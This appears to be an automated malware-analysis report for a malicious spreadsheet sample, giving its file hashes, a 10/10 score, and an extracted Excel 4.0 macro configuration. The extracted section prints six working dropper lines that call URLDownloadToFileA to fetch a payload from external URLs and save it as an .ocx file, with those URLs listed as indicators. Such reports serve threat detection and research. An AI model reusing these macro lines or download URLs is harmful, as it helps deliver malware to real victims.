44cf7efa97ac25231b0a7795d448fb2d1afd63e02521b5dc5f256a0335583e5a

General

Target

44cf7efa97ac25231b0a7795d448fb2d1afd63e02521b5dc5f256a0335583e5a
Size

70KB
Sample

241120-ypltma1hph
MD5

6c6b68e5c3cf4462cb453109ea305aa8
SHA1

2d9627a9076132949a09be5ccaa118d04f7a873b
SHA256

44cf7efa97ac25231b0a7795d448fb2d1afd63e02521b5dc5f256a0335583e5a
SHA512

a3aeb55f739342f1f03dece1113766ecc064559052807a763a21920b193461134139921ce94ef929f21f3922e4a87b5278274cac9caf7240013bb317115743e3
SSDEEP

1536:5+Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgAYW/ESKQHS1yXJFadK0VB:kKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgv

Score

10^/10

Malware Config

Extracted

Language

xlm4.0

Source

1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://farschid.de/verkaufsberater_service/OZRw36a2y1CH2clUzY/", "..\xdwno.ocx")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://77homolog.com.br/dev-jealves/GP55wbYNXnp6/", "..\xdwno.ocx")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://geowf.ge/templates/pJRea3Iu3wG/", "..\xdwno.ocx")
4
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://h63402x4.beget.tech/bin/wl0ENiE3BhELXV6V/", "..\xdwno.ocx")
5
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://ecoarch.com.tw/cgi-bin/E/", "..\xdwno.ocx")
6
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://galaxy-catering.com.vn/galxy/Fg1vvhlYJ/", "..\xdwno.ocx")

URLs

xlm40.dropper

http://farschid.de/verkaufsberater_service/OZRw36a2y1CH2clUzY/

xlm40.dropper

http://77homolog.com.br/dev-jealves/GP55wbYNXnp6/

xlm40.dropper

http://geowf.ge/templates/pJRea3Iu3wG/

xlm40.dropper

http://h63402x4.beget.tech/bin/wl0ENiE3BhELXV6V/

xlm40.dropper

http://ecoarch.com.tw/cgi-bin/E/

xlm40.dropper

https://galaxy-catering.com.vn/galxy/Fg1vvhlYJ/

Targets

- Target
  
  44cf7efa97ac25231b0a7795d448fb2d1afd63e02521b5dc5f256a0335583e5a
- Size
  
  70KB
- MD5
  
  6c6b68e5c3cf4462cb453109ea305aa8
- SHA1
  
  2d9627a9076132949a09be5ccaa118d04f7a873b
- SHA256
  
  44cf7efa97ac25231b0a7795d448fb2d1afd63e02521b5dc5f256a0335583e5a
- SHA512
  
  a3aeb55f739342f1f03dece1113766ecc064559052807a763a21920b193461134139921ce94ef929f21f3922e4a87b5278274cac9caf7240013bb317115743e3
- SSDEEP
  
  1536:5+Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgAYW/ESKQHS1yXJFadK0VB:kKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgv
Score

10^/10

discovery
behavioral1 behavioral2